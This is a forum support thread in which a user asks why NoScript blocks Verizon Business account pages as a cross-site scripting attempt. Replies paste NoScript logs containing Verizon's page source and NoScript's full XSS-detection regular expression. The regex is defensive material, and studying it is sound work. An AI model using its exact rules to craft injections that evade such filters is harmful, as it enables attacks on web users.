Hey all, I've searched around for this, but there doesn't seem to be much helpful information. On the business.verizon.com* pages a lot of the stuff like "Change My Plan" launches a new window at www22.verizon.com**, which fails every time due to:
"NoScript filtered a potential cross-site scripting (XSS) attempt from [https://www22.verizon.com]." etc.
An Unsafe Reload only restarts the "retrieving your account information process" before it inevitably fails again.
The Console shows hundreds of errors, naturally, most of which are something like this:
"Timestamp: 2/27/2013 9:02:22 PM
Warning: Unknown property '-moz-border-radius'. Declaration dropped.
Source File: https://www22.verizon.com/FORYOURSMALLB ... /order.css
Line: 396"
I tried the "geeky" regular expressions to whitelist www22.verizon.com but was unable to figure it out. Guess I'm not geeky enough.
If anybody could give me the correct whitelist expression I would appreciate it. Thanks so much!
* https://business.verizon.com/MyBusiness ... _overview#
** https://www22.verizon.com/FORYOURSMALLB ... iceCC.aspx
Verizon Business XSS Issues
Verizon Business XSS Issues
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
To get to the pertinent ones, please click the blue "Info" tab, and look for those pertaining to Noscript, and especially those that start with [XSS].ALbino wrote:The Console shows hundreds of errors, naturally,
Please post them here. If the spam filter trips, try enclosing them in Code tags. Thanks.
Also, the long URLs got truncated due to a known bug in phpBB software. Please enclose them in URL tags, or better yet, in Code tags.
(We also appreciate sanitization of links, such as https/business.verizon dot com, to help prevent even the slightest suspicion that anyone is posting merely to spam for a web site, although I'm certain that this is not the case here. General principles for all...)
Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0
Re: Verizon Business XSS Issues
Where is, where do you got to get to, "Change My Plan" ?
Oh. And WTF!
(And more to come, though it will need to go to pastebin...)
Oh. And WTF!
(And more to come, though it will need to go to pastebin...)
Code: Select all
[NoScript InjectionChecker] HTML injection:
<html><head><script language="javascript">vzLogging_appName="gbOrdering";</script>
<script language="javascript" src="/vztracker/pagetrace/pagetracker.js"></script>
<script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
<title>Registration Bridge</title>
<script type="text/javascript" src="//nexus.ensighten.com/verizon/Bootstrap.js"></script>
<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
<meta name="CODE_LANGUAGE" content="C#">
<meta name="vs_defaultClientScript" content="JavaScript">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
<!--<script language="javascript" src="../includes/javascript/css.js"></script>-->
<link rel="stylesheet" type="text/css" href="../Common/includes/css/layout_new.css">
<link rel="stylesheet" type="text/css" href="../Common/includes/css/order.css">
<!--[if lte IE 6]>
<link href="../Common/includes/css/layout_ie6.css" rel="stylesheet" type="text/css">
<![endif]-->
<script>
var fadetext=new Array()
//SET MESSAGES
fadetext[0]="Please wait ... retrieving your account information." //plain image syntax
fadetext[1]="Please wait ... retrieving your existing services information."
fadetext[2]="Please wait ... retrieving services available at your address."
fadetext[3]="Please wait ... loading products & services list."
var curMessage = 0;
var interval = 5000;
function rotatemsg()
{
//alert(document.getElementById('alertmsg').innerTEXT);
setTimeout('rotatemsg()', interval);
document.getElementById('alertmsg').innerHTML = fadetext[curMessage];
if (curMessage < fadetext.length-1)
curMessage++;
else
curMessage = 0;
}
function BeginPageLoad(Ctrl1,Ctrl2)
{
var otherApps = "";
var locationHref = '';
var catHref = '';
var LQHref = '';
var FlowRoute = 'N';
//Changes made for Project North
var PostDataToDifferentDataCenter = "";
//End
//Changes made for Project North - if condition added
if ( PostDataToDifferentDataCenter != "Y" )
{
locationHref ="RegistrationBridgeProcess.aspx?txtAppId=" + "" + "&from=" + "" + "&FlowRoute=" + FlowRoute + "&getstarted=" + LQHref + "&fromChangeAppStart=" + "" + "&MABANNER=" + "N" + "&E=" + "NA" + "&Q=" + "NA"; ;
<!--.net shutdown -->
location.href = locationHref + catHref;
// var appname = navigator.appName;
// if(appname != "Netscape")
// {
//
// var tempHTML = document.getElementById(Ctrl1).innerHTML;
// document.getElementById(Ctrl1).innerHTML = document.getElementById(Ctrl2).innerHTML;
// document.getElementById(Ctrl2).innerHTML = tempHTML;
// }
}
//Changes made for Project North - close brace added
}
</script>
</head>
<body class="order" onload="BeginPageLoad('test1','MyDiv');rotatemsg();">
<form name="Form1" method="post" action="RegistrationBridge.aspx" id="Form1" style="text-align:center">
<div>
<input name="__EVENTTARGET" id="__EVENTTARGET" value="" type="hidden">
<input name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" type="hidden">
<input name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTE3NTcwNTc2MGRk" type="hidden">
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['Form1'];
if (!theForm) {
theForm = document.Form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script language="javascript" src="../Common/includes/js/espanol.js"></script>
<script language="javascript" src="../Common/includes/js/GlobalHeader.js"></script>
<script language="javascript" src="../Common/includes/js/oo_engine.js"></script>
<script language="javascript" type="text/javascript">
var issaveorder = 'N';
if ((typeof MP != 'undefined') && (MP != null) && (MP.Domains != null))
{
MP.Domains['es']='espanol.verizon.com';
}
//window.onerror = function(errorMsg, url, lineNumber) {if(typeof Log != 'undefined')Log.Error(errorMsg, url, lineNumber); }
window.onerror = function(errorMsg, url, lineNumber)
{
//debugger;
// alert(dojoAjaxContent + ' - ' + url + ' - ' + lineNumber);
try{
var dojoAjaxContent = new Object()
dojoAjaxContent["error"] = errorMsg;
dojoAjaxContent["url"] = url;
dojoAjaxContent["line"] = lineNumber;
dojo.xhrPost({
url: '/ForYourSmallBiz/GoFlow/Common/JsError.aspx',
content: dojoAjaxContent,
load: function(){},
error: function(err){//alert("ERROR");
},
timeout: 80000
});
// try
// {
// if(location.href.toUpperCase().indexOf('VOICE')>0)
// {
// ShowTab(document.getElementById('lnkLines'), 'dvLines');
// }
// }
// catch(e)
// {}
}
catch(e)
{
//Do Nothing
}
return true;
}
function getSelectedTab() {
document.getElementById("hdnClickYesNo").value="Y";
var tab='';
var sPath = window.location.pathname;
var sPage = sPath.substring(sPath.lastIndexOf('/') + 1);
if(sPage.toUpperCase()=='VOICECONFIG.ASPX')
{
var objControl = document.getElementById('Header1_hdnSelectedVoiceTab'); //$('input[type=hidden][id*=hdnSelectedVoiceTab]');
if(tabActive.id!=null && objControl!=null)
objControl.value = tabActive.id;
}
}
function ValidateNavigationHeader(vzLink) {
document.getElementById("hdnClickYesNo").value="Y";
var pmappid = document.getElementById("curappid");
window.document.forms[0].method = "post";
if (pmappid != null && pmappid.value == "AF") {
window.document.forms[0].action = "../MyVerizonNew/SaveOrder.aspx?ClickNo=Y";
}
else {
window.document.forms[0].action = "../OrderNew/SaveOrder.aspx?ClickNo=Y";
}
window.document.forms[0].submit();
}
function NavigateHeader()
{ if(issaveorder.toLowerCase() == 'false')
VZT.ModalHandler.show({ width: 500, height: 400, skin: 'default', content: '#SaveMyOrderPopup' });
else
ValidateNavigation('http://smallbusiness.verizon.com');
}
function HideOverLay()
{
try
{
VZT.ModalHandler.hide();
}
catch(e)
{
}
}
function CheckforSaveOrder(IsSavecart)
{
var tab='';
var sPath = window.location.pathname;
var sPage = sPath.substring(sPath.lastIndexOf('/') + 1);
if(sPage.toUpperCase()=='VOICECONFIG.ASPX')
{
if(tabActive.id!=null)
tab='?Tab='+tabActive.id;
}
var URL = "SaveOrder.aspx"+tab;
if(window.location.href.indexOf("MyVerizon")>-1)
URL = "../MyVerizonNew/"+URL;
else
URL = "../OrderNew/"+URL;
if(IsSavecart=="Y"){
location.href=URL; }
else{
location.href="http://smallbusiness.verizon.com";
}
}
// Added to check the availability of chat icon (script return from AIMS) - For Business specialist - Sushanth
function AimsChatStatus(obj) {
//debugger;
if (obj == "NA") {
if (document.getElementById("divSpecialistHeader")) {
document.getElementById("divSpecialistHeader").style.display = "block";
}
}
else if (obj == "AA") {
if (document.getElementById("divSpecialistHeader")) {
document.getElementById("divSpecialistHeader").style.display = "none";
}
}
}
// Added to check the availability of chat icon
setTimeout('displayBusinessSpecialist()', 20000);
function displayBusinessSpecialist() {
//debugger;
var varSpanText = "";
if (document.getElementById("aimsChatIcon1")) {
varSpanText = document.getElementById("aimsChatIcon1").innerHTML;
}
else if (document.getElementById("aimsChatIcon")) {
varSpanText = document.getElementById("aimsChatIcon").innerHTML;
}
var varSpanIndex = varSpanText.indexOf("aimsChatIconAvailable");
if (varSpanIndex != -1) {
if (document.getElementById("divSpecialist") != null)
document.getElementById("divSpecialistHeader").style.display = "none";
}
else if (varSpanIndex == -1) {
if (document.getElementById("divSpecialistHeader")) {
if (document.getElementById("divSpecialist") != null)
document.getElementById("divSpecialistHeader").style.display = "block";
}
}
}
//Added OVER - Sushanth
</script>
<div class="vzt" style="padding: 5px;">
<div class="gb">
<a href="#" onclick="CheckforSaveOrder('N')" class="fl logo">
<img src="../Common/images/OrderNew/logo.gif" alt="Verizon"></a>
<input name="Header1$hdnSelectedVoiceTab" id="Header1_hdnSelectedVoiceTab" type="hidden">
<input value="" id="curappid" name="curappid" type="hidden">
<div class="clear">
</div>
</div>
<input id="hdnClickYesNo" name="hdnClickYesNo" value="N" type="hidden">
<input id="hdnSAVECARTSUCCESS" name="hdnSAVECARTSUCCESS" value="N" type="hidden">
</div>
<div class="fixer" style="height:50px;"></div>
<div id="MyDiv" name="MyDiv" class="vzt" align="center">
<div id="test1" class="gb" style="margin-top:30px;">
<div class="ds">
<div style="margin-left:10;margin-right:10">
<div class="middle png">
<div class="bg">
<div class="pad_wide" align="center">
<div class="t_center" id="dvProgressBar">
<h3><div id="alertmsg"></div></h3>
<img class="centered" src="../Common/images/OrderNew/loading.gif" visible="true">
<div class="fixer" style="height:15px;"></div>
</div>
</div>
</div>
</div>
<div class="bottom png">
<div class="png">
<div class="png"></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="fixer" style="height:150px;"></div>
<script language="javascript">vzLogging_appName="gbOrdering";</script>
<script language="javascript" src="/vztracker/pagetrace/pagetracker.js"></script>
<script language="javascript" src="../Common/includes/js/BrowserClose.js"></script><!-- Changes made for Release TN Chagnes -->
<script language="javascript" src="../Common/includes/js/oo_engine.js"></script><!--included for site feedback link error-->
<!-- BEGIN: OnlineOpinion v4.1 EVENT SURVEy -->
<!-- This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. -->
<script src="../Common/Includes/js/onlineopinionP41s/oo_engine.js" type="text/javascript"></script>
<script src="../Common/Includes/js/onlineopinionP41s/oo_conf_en-US_eventSX3.js" type="text/javascript"></script>
<!-- END : OnlineOpinion v4.0, Copyright 2008-2009 Opinionlab, Inc. -->
<script>
</script>
<!-- mp_trans_disable_start -->
<script language="javascript1.1">
var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
var hbx=_hbEvent("pv");hbx.vpc="HBX....u";hbx.gn="ehg-verizon.hitbox.com";
//BEGIN EDITABLE SECTION
//CONFIGURATION VARIABLES
var varLoc=document.location.hostname;
var varURL = document.location.href;
if ( varLoc.indexOf('www22') == 0 || varLoc.indexOf('espanol')==0 )
{
if(varLoc.indexOf('espanol')==0 && varURL.indexOf("stage") >=0)
{
hbx.acct="DM56....PISS;DM56....C0VN";// TEST ACCTS
}
else
{
hbx.acct="DM550....8DM;DM560....BWM";//PROD ACCTS
}
}
else
{
hbx.acct="DM560....ISS;DM560....0VN";// TEST ACCTS
}
hbx.pn="verifyservices3";//PAGE NAME(S)
hbx.mlc="vz/smallbus/order/am service easy/";//CONTENT CATEGORY
hbx.pndef="";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.lc="y"; //force lower case page names
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME
hbx.lt="auto";//LINK TRACKING
hbx.dlf="n";//DOWNLOAD FILTER
hbx.dft="n";//DOWNLOAD FILE NAMING
hbx.elf="n";//EXIT LINK FILTER
//SEGMENTS AND FUNNELS
hbx.seg="";//VISITOR SEGMENTATION
hbx.fnl="";//FUNNELS
//CAMPAIGNS
hbx.cmp="";//CAMPAIGN ID
hbx.cmpn="";//CAMPAIGN ID IN QUERY
hbx.dcmp="";//DYNAMIC CAMPAIGN ID
hbx.dcmpn="";//DYNAMIC CAMPAIGN ID IN QUERY
hbx.dcmpe="";//DYNAMIC CAMPAIGN EXPIRATION
hbx.dcmpre="";//DYNAMIC CAMPAIGN RESPONSE EXPIRATION
hbx.hra="";//RESPONSE ATTRIBUTE
hbx.hqsr="";//RESPONSE ATTRIBUTE IN REFERRAL QUERY
hbx.hqsp="";//RESPONSE ATTRIBUTE IN QUERY
hbx.hlt="";//LEAD TRACKING
hbx.hla="";//LEAD ATTRIBUTE
hbx.gp="";//CAMPAIGN GOAL
hbx.gpn="";//CAMPAIGN GOAL IN QUERY
hbx.hcn="";//CONVERSION ATTRIBUTE
hbx.hcv="";//CONVERSION VALUE
hbx.cp="null";//LEGACY CAMPAIGN
hbx.cpd="";//CAMPAIGN DOMAIN
var cv = _hbEvent("cv");
//CUSTOM VARIABLES
hbx.ci="";//CUSTOMER ID
hbx.hc1="";//CUSTOM 1
hbx.hc2="";//CUSTOM 2
hbx.hc3="";//CUSTOM 3
hbx.hc4="";//CUSTOM 4
if (varLoc.indexOf('espanol')==0 )
hbx.hc4="spanish";
else
hbx.hc4="";
hbx.hrf="";//CUSTOM REFERRER
hbx.pec="";//ERROR CODES
//INSERT CUSTOM EVENTS
hbx.lvm="300";
cv.c8 = "";//Session Id
cv.c9 = "";
cv.c10 = "";
cv.c11 = ""; // Included to get the c11 Variable for the NC Scenarios in the Order Address Info Page and OOF Page and LBO.
cv.c12 = ""; // Qualify Attempt Go Flow Session ID . For NC Flow -- OrderAddress Info Page and for AMF Registration Bridge Page and LBO for Common
cv.c14 = ""; // Session ID for Review Order Page
//END EDITABLE SECTION
</script>
<script language="javascript1.1" src="/ForYourSmallBiz/GoFlow/common/includes/js/hbx.js"></script>
<!-- mp_trans_disable_end -->
<!-- For WR 75556 - Site Catalyst -->
<script language="javascript">
var varLoc = document.location.hostname;
var varURL = document.location.href;
var s_account = 'verizontelecomglobal,verizontelecomsmb';
</script>
<script language="javascript" src="https://www22.verizon.com/includes/javascript/omnicode.js"></script>
<script language="javascript">
if(typeof (s_837) != "undefined")
{
s_837.pfxID = "smb"
s_837.pageLanguage="" //override en for language by populating this var with alternate 2 digit language code
if(varLoc.indexOf('espanol') > -1 ) s_837.pageLanguage = "es"
s_837.prop2="small business"
s_837.prop3="order"
s_837.prop6="business"
s_837.simplepageName = "";
s_837.detailpageName = "/FORYOURSMALLBIZ/GoFlow/MyVerizonNew/RegistrationBridge.aspx";
s_837.prop4 = "";
s_837.prop5 = "smb user";
s_837.prop10 = "";
s_837.prop22 = "";
s_837.prop48 = "EORDERING";
s_837.prop74 = "return";
s_837.prop75 = "";
var s_code=s_837.t();
if(s_code)
document.write(s_code);
}
</script>
<!-- For QH 61 -- ClearSaleing Tags -->
<script type="text/javascript">
var csOrderNum = 'jfsi6022YD';
var csOrderType = 'Loop Qual Attempt_General-SB';
var csSalesStageCode = 'Closed/Won';
</script>
<script type="text/javascript">
csCookieDomain = 'verizon.com';
</script>
<script language="javascript" src="https://dsa.csdata1.com/data/js/19000367/csgather.js"></script>
<script language="javascript" type="text/javascript">
</script>
<!--<span id="footer"> -->
<div class="vzt">
<div class="gb">
<div id="footer" class="footer">
<div class="fl">
<ul>
<li><a id="Footer1_Truste" style="float: none" onclick="javascript:window.open('http://www22.verizon.com/privacy/'); return false;" href="javascript:void(0);" name="&lid=footer_trusteeimage">
<img alt="Reviewed by TRUSTe site privacy statement" src="../Common/Images/truste_logo2.gif"></a></li>
<li class="last"><a style="float: none" onclick="javascript:window.open('http://www.bbbonline.org/cks.asp?id=108072593112'); return false;" href="javascript:void(0);" name="&lid=hp_res_footer_bbb_logo" target="_blank">
<img oncontextmenu="alert('Use without permission is prohibited. The BBB Accredited Business seal is a trademark of the Council of Better Business Bureaus, Inc.'); return false;" alt="Click to verify BBB accreditation and to see a BBB report." src="../Common/Images/bbb.jpg"></a></li>
</ul>
</div>
<div class="fr">
<ul>
<li>
<a href="#" onclick="javascript:O_LC();return false;" name="&lid=footer_privacy" target="#">Site Feedback</a>
<span class="divider_new">|</span>
</li>
<li><span class="nolink" style="font-size:12px;"><font color="black"> © 2013 Verizon </font></span></li>
</ul>
</div>
</div>
<!--From -->
<span id="footer1_lblSession" style="display:inline-block;color:White;font-size:10px;width:73px;"></span>
<span id="footer1_lblEpSession" style="display:inline-block;color:White;font-size:10px;width:73px;"></span>
<span id="footer1_lblServerName" style="display:inline-block;color:White;font-size:10px;width:73px;">FE</span>
<span id="footer1_DatacenterValue"></span>
<br>
<!--</span>-->
</div>
</div>
<br>
<div id="CJTag" style="DISPLAY: block">
</div>
<!--FloodLight Tag,Added By Sasanka on 21st May 2010, Please Do not remove -->
<div id="FLTag" style="DISPLAY:none">
</div>
<!-- CT Tag,Added By Sasanka on 21st May 2010, Please do not Remove -->
<div id="CTTag" style="DISPLAY:none">
</div>
<script language="javascript">
function OpenPop(sUrl, title)
{
window.open(sUrl, title, 'toolbar=0,scrollbars=1,dependent=yes,location=0,statusbar=0,menubar=0,width=700,height=500,left=30,top=40,resizable=0');
return;
}
// Changes made for Release TN Changes
if (document.body != null && typeof(BrowserClose) != 'undefined')
{
document.body.onbeforeunload = BrowserClose;
}
var C1Moffer="";
if(C1Moffer!=null && C1Moffer!="Y")
{
if (document.body != null)
{
usrAgnt = navigator.appName;
usrAgnt = usrAgnt.toLowerCase();
if (usrAgnt == 'netscape')
{
window.onbeforeunload = function(event) { try { SaveCartBrowserClose(event); } catch (e) {} }
}
else
{
document.body.onbeforeunload = function() { try { return SaveCartBrowserClose(event); } catch (e) {} };
}
}
}
//End of Changes made for Release TN Changes
custom_var = "";//this variable used in oo_engine.js file
if ((typeof oOobj5 != 'undefined') && (oOobj5 != null) && (oOobj5.Metrics != null) && (oOobj5.Metrics.custom != null))
oOobj5.Metrics.custom.sessionid = "";
</script>
<script type="text/javascript">
var maskArr = document.getElementsByTagName("input");
var isVECFlow = '';
if(document.location.href.indexOf("repcobrowse")>-1)
{
if(typeof(maskArr)!=null)
{
for(i=0;i < maskArr.length; i++)
{
if (maskArr[i].id.indexOf("_SECUREINFO")>0)
{
maskArr[i].value="***";
}
}
}
}
</script>
<script src="../common/includes/js/cb.js"></script>
<script src="../common/includes/js/bootstrapper.js"></script>
<script src="../common/includes/js/parser.js"></script>
<script src="../common/includes/js/sandbox.js"></script>
<script src="../common/includes/js/tabset.js"></script>
<script src="../common/includes/js/overlay.js"></script>
<script src="../common/includes/js/modal.js"></script>
<script src="../common/includes/js/scroller.js"></script>
<script src="../common/includes/js/tooltip.js"></script>
<script language="javascript" src="https://collaborateext.verizon.com/pre/prescripts/FiosOR7001/i2cpre.js"></script>
<script type="text/javascript" lang="javascript">
var aimsZip = "";
var aimsState = "";
var aimsSession = "";
var productdetails ="";
var fios ="";
//WR 70676 - Chat Platform Migration SMB AMIS - Sathish 19/Sep/2011
var actualBundleCode= "";
var aimsFlow ="";
var aimsChatCreditFlow="0";
//Newly added by Sushanth for the AIMS Credit Chat
var newconnect ="";
var winback ="";
var cvcnumber =""; // Credit Refrence No
var onetimefee ="";
var ordertotal ="";
var ordernumber =""; // MON
var actualName =""; // LastName FirstName
var actualEmail ="";
var accountnumber ="";
var productCode="";
if(window.attachEvent != null)
window.attachEvent("onload",SetCustomerInfo);
else if(window.addEventListener != null)
window.addEventListener("load",SetCustomerInfo,true);
function SetCustomerInfo()
{
if(typeof aims_setCustomerInfo != "undefined")
{
aims_setExtraCustomerInfo('ZIP_CODE',aimsZip); // zip code as a String Value.
aims_setExtraCustomerInfo('DOTCOM_SESSIONID',aimsSession);
aims_setCustomerInfo('STATE',aimsState);
//WR 70676 - Chat Platform Migration SMB AMIS - Sathish 19/Sep/2011
//if(aimsFlow!=null && aimsFlow!="")
//aims_setExtraCustomerInfo ('other', aimsFlow + "_SMB");
//else
aims_setExtraCustomerInfo('other',aimsFlow);
aims_setExtraCustomerInfo('BundleCode',actualBundleCode);
aims_setExtraCustomerInfo('aimsChatCreditFlow',aimsChatCreditFlow);
// Newly added by Sushanth for the AIMS Credit Chat
aims_setExtraCustomerInfo('NEW_CONNECT',newconnect); // Flag to indiciate if it is a new connect customer
aims_setExtraCustomerInfo('WINBACK',winback); // flag to indicate if it is a winback customer
aims_setExtraCustomerInfo('CRV_NUMBER',cvcnumber);
aims_setExtraCustomerInfo('ONE_TIME_FEE',onetimefee); //one time fee amount
aims_setExtraCustomerInfo('ORDER_TOTAL',ordertotal); //order total amount
aims_setExtraCustomerInfo('ORDER_NUMBER',ordernumber); //MON if exists or individual order number if available.
aims_setExtraCustomerInfo('ACCOUNT_NUMBER',accountnumber); //if existing customer
aims_setCustomerInfo('NAME',actualName); //customer name
aims_setCustomerInfo('EMAIL',actualEmail); //customer Email
aims_setExtraCustomerInfo('PRODUCT_DETAILS',productdetails);
aims_setExtraCustomerInfo('FIOS',fios);
aims_setExtraCustomerInfo('product code',productCode); // Qualified Products
aims_setExtraCustomerInfo('mon',ordernumber); //MON if exists or individual order number if available.
}
}
</script>
</form>
<span style="display: none;" id="PREhiddenSpan"><form name="PREhtmlSourceForm" id="PREhtmlSourceForm" method="post" action="https://collaborateext.verizon.com/pre/pre/pre.serv" target="PREmyFrame"><input name="PREhtmlSource" id="PREhtmlSource" value="" type="hidden"><input id="PREclientURL" name="PREclientURL" value="" type="hidden"><input name="pagesource" id="pagesource" value="true" type="hidden"><input name="pagerefresh" id="pagerefresh" value="false" type="hidden"></form><iframe name="PREmyFrame" src=
matches <[^\w<>]*(?:[^<>"'\s]*:)?[^\w<>]*(?:\W*s\W*c\W*r\W*i\W*p\W*t|\W*f\W*o\W*r\W*m|\W*s\W*t\W*y\W*l\W*e|\W*s\W*v\W*g|\W*m\W*a\W*r\W*q\W*u\W*e\W*e|(?:\W*l\W*i\W*n\W*k|\W*o\W*b\W*j\W*e\W*c\W*t|\W*e\W*m\W*b\W*e\W*d|\W*a\W*p\W*p\W*l\W*e\W*t|\W*p\W*a\W*r\W*a\W*m|\W*i?\W*f\W*r\W*a\W*m\W*e|\W*b\W*a\W*s\W*e|\W*b\W*o\W*d\W*y|\W*m\W*e\W*t\W*a|\W*i\W*m\W*a?\W*g\W*e?|\W*v\W*i\W*d\W*e\W*o|\W*a\W*u\W*d\W*i\W*o|\W*b\W*i\W*n\W*d\W*i\W*n\W*g\W*s|\W*s\W*e\W*t|\W*a\W*n\W*i\W*m\W*a\W*t\W*e)[^>\w])|(?:<\w[\s\S]*[\s\/]|['"](?:[\s\S]*[\s\/])?)(?:formaction|style|background|src|lowsrc|ping|on(?:e(?:rror(?:update)?|nd)|c(?:o(?:nt(?:extmenu|rolselect)|py)|ut|lick|(?:ellc)?hange)|m(?:o(?:ve(?:end|start)?|use(?:o(?:ut|ver)|up|(?:mo|lea)ve|down|wheel|enter))|essage)|lo(?:ad|secapture)|d(?:r(?:ag(?:en(?:d|ter)|drop|over|leave|start)?|op)|ata(?:setc(?:hanged|omplete)|available)|blclick|eactivate)|s(?:t(?:op|art)|elect(?:start)?|croll|ubmit)|b(?:e(?:for(?:e(?:c(?:ut|opy)|p(?:aste|rint)|u(?:pdate|nload)|activate|editfocus)|deactivate)|gin)|lur|ounce)|p(?:ast|ropertychang)e|key(?:up|down|press)|f(?:o(?:cus(?:in|out)?|rm(?:input|change))|i(?:nish|lterchange))|in(?:put|valid)|a(?:fter(?:print|update)|bort|ctivate)|r(?:e(?:s(?:et|ize)|peat|adystatechange)|ow(?:e(?:xit|nter)|s(?:delete|inserted)))|zoom|help|unload))[\s\x08]*=
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 SeaMonkey/2.17a2
Re: Verizon Business XSS Issues
Code: Select all
[NoScript XSS] Sanitized suspicious upload to [https://collaborateext.verizon.com/pre/pre/pre.serv###DATA###%3Chtml%3E%3Chead%3E%3Cscript+language%3D%22javascript%22%3EvzLogging_appName%3D%22gbOrdering%22%3B%3C%2Fscript%3E%0D%0A%3Cscript+language%3D%22javascript%22+src%3D%22%2Fvztracker%2Fpagetrace%2Fpagetracker.js%22%3E%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%2F%2Fnexus.ensighten.com%2Fverizon%2FBootstrap.js%22%3E%3C%2Fscript%3E%0D%0A++++%3Ctitle%3ERegistration+Bridge%3C%2Ftitle%3E%0D%0A++++%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%2F%2Fnexus.ensighten.com%2Fverizon%2FBootstrap.js%22%3E%3C%2Fscript%3E%0D%0A++++%3Cmeta+name%3D%22GENERATOR%22+content%3D%22Microsoft+Visual+Studio+.NET+7.1%22%3E%0D%0A++++%3Cmeta+name%3D%22CODE_LANGUAGE%22+content%3D%22C%23%22%3E%0D%0A++++%3Cmeta+name%3D%22vs_defaultClientScript%22+content%3D%22JavaScript%22%3E%0D%0A++++%3Cmeta+name%3D%22vs_targetSchema%22+content%3D%22http%3A%2F%2Fschemas.microsoft.com%2Fintellisense%2Fie5%22%3E%0D%0A++++%3C%21--%3Cscript+language%3D%22javascript%22+src%3D%22..%2Fincludes%2Fjavascript%2Fcss.js%22%3E%3C%2Fscript%3E--%3E%0D%0A+++%0D%0A++++++++%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22..%2FCommon%2Fincludes%2Fcss%2Flayout_new.css%22%3E+%0D%0A++++++++%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22..%2FCommon%2Fincludes%2Fcss%2Forder.css%22%3E+++%0D%0A++++++++%3C%21--%5Bif+lte+IE+6%5D%3E%0D%0A++++++++%3Clink+href%3D%22..%2FCommon%2Fincludes%2Fcss%2Flayout_ie6.css%22+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22%3E%0D%0A++++++++%3C%21%5Bendif%5D--%3E%0D%0A+++%0D%0A++++%3Cscript%3E%0D%0A%09%09var+fadetext%3Dnew+Array%28%29%0D%0A%09%09%2F%2FSET+MESSAGES%0D%0A%09%09fadetext%5B0%5D%3D%22Please+wait+...+retrieving+your+account+information.%22+%2F%2Fplain+image+syntax%0D%0A%09%09fadetext%5B1%5D%3D%22Please+wait+...+retrieving+your+existing+services+information.%22+%0D%0A%09%09fadetext%5B2%5D%3D%22Please+wait+...+retrieving+services+available+at+your+address.%22%0D%0A%09%09fadetext%5B3%5D%3D%22Please+wait+...+loading+products+%26+services+list.%22%0D%0A%09%09var+curMessage+%3D+0%3B%0D%0A%09%09var+interval+%3D+5000%3B%0D%0A%09%09%09%0D%0A%09%09function+rotatemsg%28%29%0D%0A%09%09%7B%0D%0A%09%09%09%2F%2Falert%28document.getElementById%28%27alertmsg%27%29.innerTEXT%29%3B%0D%0A%09%09%09setTimeout%28%27rotatemsg%28%29%27%2C+interval%29%3B%0D%0A%09%09%09document.getElementById%28%27alertmsg%27%29.innerHTML+%3D+fadetext%5BcurMessage%5D%3B%0D%0A%09%09%09if+%28curMessage+%3C+fadetext.length-1%29%0D%0A%09%09%09%09curMessage%2B%2B%3B%0D%0A%09%09%09else%0D%0A%09%09%09%09curMessage+%3D+0%3B%0D%0A%09%09%7D%09%09%09%0D%0A%09%09function+BeginPageLoad%28Ctrl1%2CCtrl2%29+%0D%0A%09%09%7B%0D%0A%09%09++++var+otherApps+%3D+%22%22%3B%0D%0A%09%09++++var+locationHref+%3D+%27%27%3B%0D%0A%09%09%09var+catHref%09%09+%3D+%27%27%3B%0D%0A%09%09%09var+LQHref%09%09+%3D+%27%27%3B%0D%0A++++++++++++var+FlowRoute+%3D+%27N%27%3B%0D%0A++++++++++++%2F%2FChanges+made+for+Project+North%0D%0A%0D%0A++++++++++++++var+PostDataToDifferentDataCenter+%3D+%22%22%3B%0D%0A++++++++++++%2F%2FEnd%0D%0A%0D%0A+++++++++%2F%2FChanges+made+for+Project+North+-+if+condition+added%0D%0A+++++++++if+%28+PostDataToDifferentDataCenter+%21%3D+%22Y%22+%29%0D%0A+++++++++%7B%0D%0A++++++++++++%0D%0A%09%09%09%09locationHref+%3D%22RegistrationBridgeProcess.aspx%3FtxtAppId%3D%22++%2B+%22%22+%2B+%22%26from%3D%22++%2B+%22%22+%2B+%22%26FlowRoute%3D%22+%2B+FlowRoute+%2B+%22%26getstarted%3D%22+%2B+LQHref+%2B+%22%26fromChangeAppStart%3D%22++%2B+%22%22+%2B+%22%26MABANNER%3D%22+%2B+%22N%22+%2B+%22%26E%3D%22+%2B+%22NA%22+%2B+%22%26Q%3D%22+%2B+%22NA%22%3B+%3B+%0D%0A%09%09%09%09%0D%0A%09%09%09%3C%21--.net+shutdown+--%3E%0D%0A%09%09%09%0D%0A%0D%0A%0D%0A%09%09%09location.href+%3D+locationHref+%2B+catHref%3B%0D%0A%2F%2F%09%09%09var+appname+%3D+navigator.appName%3B%0D%0A%2F%2F%09%09%09if%28appname+%21%3D+%22Netscape%22%29%0D%0A%2F%2F%09%09%09%7B%0D%0A%2F%2F%09%09%09%0D%0A